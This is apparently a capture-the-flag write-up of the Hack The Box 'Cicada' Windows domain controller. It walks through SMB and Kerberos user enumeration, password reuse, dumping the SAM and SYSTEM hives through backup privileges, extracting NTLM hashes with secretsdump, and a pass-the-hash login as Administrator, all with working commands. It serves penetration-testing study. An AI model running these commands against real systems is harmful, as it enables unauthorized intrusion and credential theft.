Cicada Hack The Box Writeup

Cicada is an easy-difficulty Windows machine designed to be straightforward, with no rabbit holes. Let’s dive in and explore how to hack this box!

As a beginner in hacking, the most important step is reconnaissance, and Nmap is an essential tool for this process. However, before diving into reconnaissance, it’s essential to map the target machine’s IP address to a hostname by adding an entry to the /etc/hosts file. This step ensures seamless communication with the target during the hacking process.

To do this, open the /etc/hosts file using the following command:

sudo nano /etc/hosts

Add the target machine’s IP address and map it to the hostname cicada.htb as shown below:

<Target_IP>    cicada.htb

Replace <Target_IP> with the actual IP address of the machine. Here’s a visual example for reference:

Nmap Scan Results

To begin reconnaissance, I ran an Nmap scan using the following command:

nmap -sC -sV 10.10.11.35

This command performs a script scan (-sC) and a version detection scan (-sV) to gather detailed information about the target. Here are the results:
Nmap Output:

Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.061s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-31 13:36:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-31T13:37:15
|_  start_date: N/A
|_clock-skew: 6h43m37s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.36 seconds

Analysis of the Results
The Nmap scan revealed several open ports and services running on the target machine. Here’s a breakdown of the key findings:

1.Domain Controller Identification:

• The hostname CICADA-DC.cicada.htb and the presence of Active Directory-related services (LDAP, Kerberos) suggest that this machine is a Domain Controller.

2.Open Ports and Services:

• Port 53 (DNS): Indicates a DNS server is running, which is typical for a Domain Controller.

• Port 88 (Kerberos): Used for authentication in Active Directory environments.

• Ports 135, 139, 445 (SMB/RPC): Commonly associated with Windows file sharing and remote procedure calls.

• Ports 389, 636, 3268, 3269 (LDAP): Used for directory services, with ports 636, 3269 being LDAP over SSL.

• Port 5985 (WinRM): Indicates the Windows Remote Management service is running, which could be a potential entry point.

3.Security Observations:

• SMB Signing: Enabled and required, which makes SMB-based attacks more challenging.

• SSL Certificates: The certificates for LDAP services are valid and tied to the hostname CICADA-DC.cicada.htb.

Next Steps
Based on the Nmap results, the following steps are recommended:

1.Enumerate SMB Shares: Check for accessible shares using tools like smbclient or crackmapexec.

2.Inspect LDAP: Use tools like ldapsearch to gather information about the Active Directory environment.

3.Explore WinRM: Since port 5985 is open, WinRM could be a potential vector for exploitation.

Enumerating SMB Shares

To gather more information about the target, I used smbclient to enumerate the SMB shares available on the machine. The following command was executed:

smbclient -L //10.10.11.35 -N

This command lists all available shares on the target (-L) without attempting to authenticate (-N). Here are the results:
SMB Share Enumeration Results:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
DEV             Disk      
HR              Disk      
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share

Analysis of SMB Shares

The enumeration revealed several SMB shares, each serving a specific purpose:

1.Default Administrative Shares:

• ADMIN$: Used for remote administration.

• C$: Provides access to the root of the C: drive.

2.Custom Shares:

• DEV: Likely used for development purposes.

• HR: Possibly related to human resources data.

3.System Shares:

• IPC$: Used for inter-process communication.

• NETLOGON and SYSVOL: Critical for Active Directory logon and Group Policy distribution.

Next Steps

1.Explore Accessible Shares:

• Attempt to access the non-default shares (DEV and HR) to see if they contain any useful information or files.

2.Check for Null Session Vulnerability:

• Test if the IPC$ share allows null session enumeration, which could reveal additional information about the system.

3.Gather Credentials:

• If credentials are obtained (e.g., through other enumeration techniques), revisit the administrative shares (ADMIN$ and C$) for deeper access.

Exploring the HR Share

After enumerating the available SMB shares, I found the HR share to be particularly interesting. To explore its contents, I used the following command:

smbclient //10.10.11.35/HR -N

This command connects to the HR share without authentication (-N). Once connected, I listed the files in the share using the ls command:
Contents of the HR Share:

smb: \> ls
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 435811 blocks available

Retrieving the File
The share contained a single file named Notice from HR.txt. To download it for further analysis, I used the get command:

smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)

Analyzing the HR Notice
After downloading the Notice from HR.txt file, I examined its contents using the cat command:

cat Notice\ from\ HR.txt

Contents of Notice from HR.txt:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Key Findings
1.Default Password:

• The file contains a default password: Cicada$M6Corpb*@Lp#nZp!8.

• This password is likely associated with a new hire’s account, which could be a potential entry point.

2.Username Hint:

• While the file does not explicitly mention a username, it references logging into a "Cicada Corp account." This suggests that usernames might follow a predictable pattern (e.g., firstname.lastname or newhire).

Next Steps
1.Identify Usernames:

• Use tools like kerbrute or enum4linux or nxc to enumerate valid usernames in the Active Directory environment.

• Alternatively, consider common username formats (e.g., admin, newhire, user) based on the context.

2.Test the Default Password:

• Attempt to authenticate using the default password Cicada$M6Corpb*@Lp#nZp!8 with potential usernames.

• Focus on services like SMB, WinRM (port 5985), or Kerberos (port 88).

3.Explore WinRM:

• Since port 5985 (WinRM) is open, use tools like evil-winrm to test the credentials and gain access to the machine.

Enumerating Usernames

To identify valid usernames on the target machine, I used two approaches: Kerberos enumeration with Nmap and SMB RID brute-forcing with nxc.
1. Kerberos Enumeration with Nmap
I started by using Nmap’s krb5-enum-users script to enumerate Kerberos principals. The following command was executed:

nmap -Pn -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='cicada.htb' 10.10.11.35

Results:

Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.046s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     guest@cicada.htb
|_    administrator@cicada.htb

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Analysis:
Two valid usernames were discovered:

• guest

• administrator

2. SMB RID Brute-Forcing with nxc

Next, I used nxc to perform a RID brute-force attack on the SMB service. This technique enumerates users and groups by querying Security Identifiers (SIDs). The following command was executed:

nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute 3000

Results:

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                           
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\anonymous: (Guest)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

The RID brute-force attack revealed several valid usernames:

• Administrator

• Guest

• krbtgt

• CICADA-DC$ (machine account)

• john.smoulder

• sarah.dantelia

• michael.wrightson

• david.orelious

• emily.oscars

Consolidated List of Usernames
Based on the enumeration results, the following usernames were identified:

administrator
guest
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Enumerating User Information with enum4linux

While enum4linux is a powerful tool for enumerating information from Windows systems, it does not include a built-in brute-force feature. To work around this limitation, I manually tested the default password Cicada$M6Corpb*@Lp#nZp!8 against the enumerated usernames. The account michael.wrightson was found to still be using the default password. To gather more information, I ran the following enum4linux command:

enum4linux -A -a -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35

Key Findings from enum4linux:

1.Valid Credentials:

• The server allows sessions using the username michael.wrightson and the password Cicada$M6Corpb*@Lp#nZp!8.

2.Domain Information:

• Domain Name: CICADA

• Domain SID: S-1-5-21-917908876-1423158569-3159038727

3.OS Information:

• The target is a Windows Server acting as a Primary Domain Controller (PDC).

• OS Version: Windows Server 2022 (based on the platform ID and server type).
  4.User Accounts:
  The enumeration revealed several user accounts, including:

• Administrator

• Guest

• john.smoulder

• sarah.dantelia

• michael.wrightson

• david.orelious

• emily.oscars

5.Interesting Note:
The account david.orelious has a description that reads:

Just in case I forget my password is aRt$Lp#7t*VQ!3

Next Steps

1.Test the Password for david.orelious:

• Use the password aRt$Lp#7t*VQ!3 to attempt authentication for the david.orelious account.

• Test the password across services like SMB, WinRM, and Kerberos.

2.Explore Access for michael.wrightson:

• Since michael.wrightson uses the default password, explore what access this account has (e.g., file shares, group memberships).

3.Check for Privilege Escalation Opportunities:

• If david.orelious ormichael.wrightson has elevated privileges, use their credentials to escalate access.

Accessing the DEV Share as david.orelious

After successfully obtaining the password aRt$Lp#7t*VQ!3 for the account david.orelious, I decided to explore the SMB shares on the target machine. While the HR share was accessible anonymously, I used the credentials for david.orelious to access the DEV share. The following command was executed:

smbclient //10.10.11.35/DEV -U david.orelious

Contents of the DEV Share:

smb: \> ls
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 433661 blocks available

Retrieving the Backup Script

The DEV share contained a PowerShell script named Backup_script.ps1. I downloaded the file using the get command:

smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)

Analyzing the Backup Script
The contents of Backup_script.ps1 were as follows:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Key Findings
1.Hardcoded Credentials:

• The script contains hardcoded credentials for the user emily.oscars: Username: emily.oscars Password: Q!3@Lp#M6b*7t*Vt

2.Backup Process:

• The script is designed to create a backup of the C:\smb directory and save it to D:\Backup as a .zip file.

Observations

1.Security Misconfiguration:

• Hardcoding credentials in scripts is a significant security risk, as it exposes sensitive information to anyone with access to the script.

• The password Q!3@Lp#M6b*7t*Vt could be reused elsewhere, making it a potential attack vector.

2.Potential Privilege Escalation:

• If the emily.oscars account has elevated privileges, these credentials could be used to escalate access on the target machine.

Next Steps

1.Test the Credentials for emily.oscars:

• Use the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt to attempt authentication across services like SMB, WinRM, and Kerberos.

2.Explore Access for emily.oscars:

• If the credentials are valid, enumerate the privileges and access associated with the emily.oscars account.

3.Investigate Backup Directories:

• Check the C:\smb and D:\Backup directories for any sensitive files or information that could aid in further exploitation.

Gaining Access via WinRM

Using the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt obtained from the Backup_script.ps1 file, I attempted to authenticate via WinRM (Windows Remote Management) using evil-winrm. The following command was executed:

evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Successful Access:

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

You can find the user flag by yourself okay?

Privilege Escalation

When assessing the privileges of the user emily.oscars on the target system, we can use the whoami /priv command to determine whether any elevated privileges are available for exploitation. In this case, the following privileges were identified:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Analysis of Privileges
1.SeBackupPrivilege:

• Allows the user to back up files and directories, bypassing file permissions.

• This privilege can be used to access sensitive files, such as the SAM and SYSTEM registry hives, which store password hashes.

2.SeRestorePrivilege:

• Allows the user to restore files and directories, bypassing file permissions.

• This privilege can be used to overwrite system files or inject malicious code.

3.Other Privileges:

• While SeShutdownPrivilege, SeChangeNotifyPrivilege, and SeIncreaseWorkingSetPrivilege are enabled, they are less useful for privilege escalation in this context.

Leveraging SeBackupPrivilege and SeRestorePrivilege

With SeBackupPrivilege and SeRestorePrivilege enabled, I decided to escalate privileges by extracting the SAM and SYSTEM registry hives. These hives contain password hashes for local accounts, which can be cracked or used for lateral movement.

Step 1: Copy the SAM and SYSTEM Registry Hives
Using the reg save command, I saved the SAM and SYSTEM hives to a writable directory (C:\Temp):

reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM

Step 2: Download the Hives to the Attacker Machine
Using evil-winrm, I downloaded the SAM and SYSTEM files to my local machine for further analysis:

download C:\Temp\SAM
download C:\Temp\SYSTEM

Step 3: Extract NTLM Hashes Using secretsdump.py
To extract NTLM hashes, we use the secretsdump.py script from the Impacket toolkit. Before running the script, we set up a virtual environment:

python3 -m venv ~/impacket-venv
source ~/impacket-venv/bin/activate

Then, we run secretsdump.py to extract the hashes from the dumped registry files:

python ~/impacket-venv/bin/secretsdump.py -sam /home/kali/SAM -system /home/kali/SYSTEM LOCAL

Step 4: Extracted NTLM Hashes
The script outputs NTLM hashes, including the Administrator hash:

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Key Findings

1.Administrator NTLM Hash:

• The NTLM hash for the Administrator account was successfully extracted:

2b87e7c93a3e8a0ea4a581937016f341

2.Other Accounts:

• Hashes for the Guest and DefaultAccount were also extracted, but these accounts are typically less useful for privilege escalation.

Gaining Administrator Access
With the Administrator NTLM hash, I used evil-winrm to authenticate as the Administrator account and gain high-privilege access to the target machine.

Command Executed:

evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Successful Access:

Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator

This write-up documents my journey through the Cicada machine on Hack The Box, from initial reconnaissance to privilege escalation. I hope this detailed explanation provides valuable insights into the techniques and tools used during the process. If you found this guide helpful, I encourage you to share it with friends and fellow enthusiasts who might benefit from it.

Your feedback is greatly appreciated! If you have any questions, suggestions, or additional tips, feel free to reach out. Happy hacking!